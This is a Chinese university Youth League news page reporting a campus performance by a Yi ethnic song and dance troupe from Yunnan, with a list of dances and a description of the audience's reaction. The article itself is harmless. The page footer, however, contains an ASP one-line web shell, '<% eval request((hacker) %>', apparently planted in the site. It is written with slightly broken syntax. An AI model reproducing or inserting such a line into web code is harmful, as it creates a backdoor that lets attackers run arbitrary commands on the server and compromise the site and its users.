当前位置:共青团上海海洋大学委员会 >> 学生组织 >> 校艺术团 >> 正文  
站内信息搜索:
彝族歌舞展示别样风情 “高雅艺术进校园”圆满举行
[2012年02月29日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

12月27日晚,我校迎来了本学期最后一场高雅艺术进校园活动。本场演出由浦东新区文化艺术指导中心主办,申港街道办事处承办,来自云南楚雄彝族自治州民族艺术剧院歌舞艺术家为现场观众献上精彩纷呈的表演。

党委副书记、副校长黄晞建向云南楚雄彝族自治州民族艺术剧院歌舞团赠送百年校庆纪念品

活动开始前申港街道党工委委员、纪工委书记郭根明上台致辞,我校党委副书记、副校长黄晞建上台赠与云南楚雄彝族自治州民族艺术剧院歌舞团百年校庆纪念品,对云南的艺术家来到上海致以热烈的欢迎和诚挚的祝福。

彝族舞蹈《欢乐的节目》

维族舞蹈《美丽姑娘》

傣族独舞《孔雀飞来》

彝族舞蹈《女人·烟锅》

彝族舞蹈《他·她们》

小号演奏《北国之春》

彝族舞蹈《烟盒变奏》

彝族舞蹈《阿惹妞》

《干了这杯酒》献上真挚祝福

《欢乐的节目》、《美丽姑娘》等一大批具有民族文化特色、有时代气息绚丽的民族歌舞为在场观众描绘出七彩云南的万种风情,述说着云南25个少数民族,多姿多彩的民风民俗和丰富独特的人文景观,让观众们近距离领略云南民间文化的精髓。
在《干了这杯酒》的欢快歌声中场内迎来一阵小高潮,观众们纷纷伴随音乐为演唱者拍打节奏并给予热烈掌声。间奏之余,趁着新的一年到来之际,表演者献上了真挚的节日祝福和美好心愿。
孔雀作为彝族人民心中的神鸟,人们纷纷模仿其姿态表达出内心的欢愉和对未来的向往,《孔雀飞来》独舞为观众们既展现了舞者的优美舞姿又将孔雀的万种风情表现得淋漓尽致。观众为其曼妙的舞姿深深折服。 随后,在悠扬的小号独奏曲目《北国之春》、热情的《 西班牙斗牛士》曲调声中在场观众沉浸在美妙的音乐声中。整场演出最后在《火一般的彝家山寨》舞蹈中落下帷幕,艺术家们用舞蹈展现云南人民火一般的热情和对今后美好未来的热切盼望。
彝族这个火一般的民族,能歌善舞、热情豪爽、积极向上的精神面貌给在校大学生留下了深刻印象。通过此次高雅艺术活动,我校大学生有机会近距离了解少数民族的习俗风情,进一步弘扬中华民族先进文化,在促进文化交流的同时更为和谐美好共同发展打下坚实基础!

 

关闭窗口

上一篇:没有了

下一篇:让青春放歌 我校艺术团首登上海大剧院舞台
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>